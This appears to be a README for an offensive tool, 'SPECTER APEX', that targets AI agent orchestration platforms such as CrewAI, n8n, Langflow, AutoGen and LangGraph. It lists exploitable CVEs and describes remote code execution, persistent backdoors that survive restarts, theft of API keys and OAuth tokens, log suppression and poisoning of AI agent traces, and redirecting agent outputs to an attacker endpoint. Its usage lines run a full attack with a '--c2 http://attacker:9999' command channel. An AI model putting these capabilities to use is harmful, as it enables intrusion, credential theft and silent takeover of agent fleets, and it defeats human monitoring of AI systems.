The world's first offensive tool targeting the AI agent orchestration control plane. One foothold = fleet-wide control. ZOMBIE hooks the agent. APEX backdoors the orchestrator.
SPECTER APEX targets the orchestration layer — the control plane that coordinates all AI agents. Where T123 SPECTER ZOMBIE implants individual agents, APEX backdoors the orchestrator itself. Compromise the orchestrator once, control the entire fleet silently.
Kill chain: ZOMBIE (hook agent) → APEX (backdoor orchestrator) → fleet operates under attacker control without touching any individual agent configuration.
Introduces L24 — AI Agent Orchestration Exploitation as a new NIGHTFALL attack layer.
⚠ Authorised security testing only. All exploitation capabilities require INJECT/UNLEASHED gate tokens.
| CVE | Platform | CVSS | Vector | Status |
|---|---|---|---|---|
| CVE-2025-25289 | CrewAI ≤0.28.0 | 9.1 | YAML deserialisation → RCE in orchestrator process | Patched 0.29.0 |
| CVE-2025-32168 | AutoGen | — | Message routing manipulation in GroupChat → task redirect | Patched |
| CVE-2026-21858 | n8n ≤1.65.0 | 10.0 | Content-type confusion webhook → unauthenticated RCE | Patched 1.121.0 |
| CVE-2026-33017 | Langflow <1.8.2 | 9.3 | Unauthenticated flow build RCE — CISA KEV, exploited in wild | Patched 1.8.2 |
Also covers LangGraph StateGraph shared-state ACL bypass (design issue, no CVE) and Flowise unauthenticated credential endpoint.
HTTP fingerprinting across all target platforms. Detects orchestrator type, version, exposed APIs, connected agent fleet, message brokers, state stores, auth mechanisms.
Exploit CVEs per platform — YAML RCE (CrewAI), content-type confusion (n8n), flow build endpoint (Langflow), GroupChat routing (AutoGen), StateDict poison (LangGraph).
Persistent mechanism per platform: Python package patch (CrewAI), SQLite workflow injection (n8n), custom component injection (Langflow), checkpointer patch (LangGraph). Survives restart.
Extract all credentials from orchestrator config, env vars, and config files. Maps: OpenAI/Anthropic API keys, LangSmith/Langfuse credentials, OAuth tokens, database URLs.
Suppress orchestrator logging, override LangChain callbacks, poison LangSmith and Langfuse traces with false entries, delete task history, inject noise into Arize Phoenix / AgentOps.
Hijack agent task outputs to attacker-controlled endpoint. Spawn attacker-controlled agents via orchestrator API. Inject false task completions into orchestrator state.
WARLORD-compatible JSON with Ed25519 signing. APX-{hex12} prefix. Mermaid architecture map, MITRE ATLAS/ATT&CK mapping, L24 classification, backdoor survival proof.
pip install specter-apex # Gate tokens export APEX_INJECT_TOKEN=$(openssl rand -hex 32) export APEX_UNLEASHED_TOKEN=$(openssl rand -hex 32) # Enumerate target specter-apex enumerate --target http://orchestrator:5678 # Full pipeline (read-only) specter-apex engage --target http://orchestrator:5678 # Full attack specter-apex engage --target http://orchestrator:5678 \ --unleashed --confirm-destroy \ --c2 http://attacker:9999
OPEN: enumerate, report, sessions INJECT: infiltrate, backdoor UNLEASHED: harvest, liar UNLEASHED + --confirm-destroy: redirect, harvest
ATLAS: AML.T0051.000 (LLM Plugin Compromise), AML.T0054.003 (Prompt Injection), AML.T0040.000 (Exfiltration via API), AML.T0048.002 (Backdoor ML Model)
ATT&CK: T1190 (Exploit Public-Facing Application), T1059.006 (Python Execution), T1546 (Event Triggered Execution), T1562.001 (Disable Security Tools), T1036 (Masquerading)